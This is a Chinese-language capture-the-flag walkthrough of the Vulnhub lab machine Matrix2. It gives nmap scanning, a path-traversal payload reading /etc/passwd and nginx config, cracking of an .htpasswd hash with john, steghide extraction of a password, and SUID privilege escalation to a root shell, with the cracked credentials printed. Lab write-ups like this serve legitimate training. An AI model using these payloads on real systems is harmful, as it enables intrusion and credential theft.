Vulnhub靶机实战——Matrix2
arp-scan -l,检测靶机ip地址
nmap -A -T4 -p- x.x.x.224
分别打开相关端口查看页面
在12322端口下,发现一个file_view.php
文件,但在robots.txt
文件发现禁用了file_view.php文件,怀疑存在任意文件包含漏洞
https://x.x.x.224:12322/robots.txt
https://x.x.x.224:12322/file_view.php
post请求file=../../../../../../../../../etc/passwd
网站是使用nginx搭建的,查看nginx的配置文件,发现了一个p4ss
文件夹比较可疑
file=../../../../../../../../../etc/nginx/sites-available/default
打开p4ss文件夹下的.htpasswd
文件发现用户Tr1n17y
及加密后的密码
使用john工具爆破,得到密码admin
打开端口1337的网页登录用户,并查看源码发现隐藏了一张图片h1dd3n.jpg
打开图片并保存到本地
h1dd3n.jpg
图片使用了隐写,使用steghide
工具将隐写的文本导出,密码是:n30
steghide --extract -sf h1dd3n.jpg
P4$$w0rd
打开12320端口的靶机控制台,使用n30
用户及密码登录
查看具有suid权限的命令,发现morpheus具体suid权限,可以借此提权
find / -perm -u=s -type f 2>/dev/null
使用以下命令提到root权限,并找到隐藏的flag
morpheus 'BEGIN {system("/bin/sh")}'
进入root目录,查看flag.txt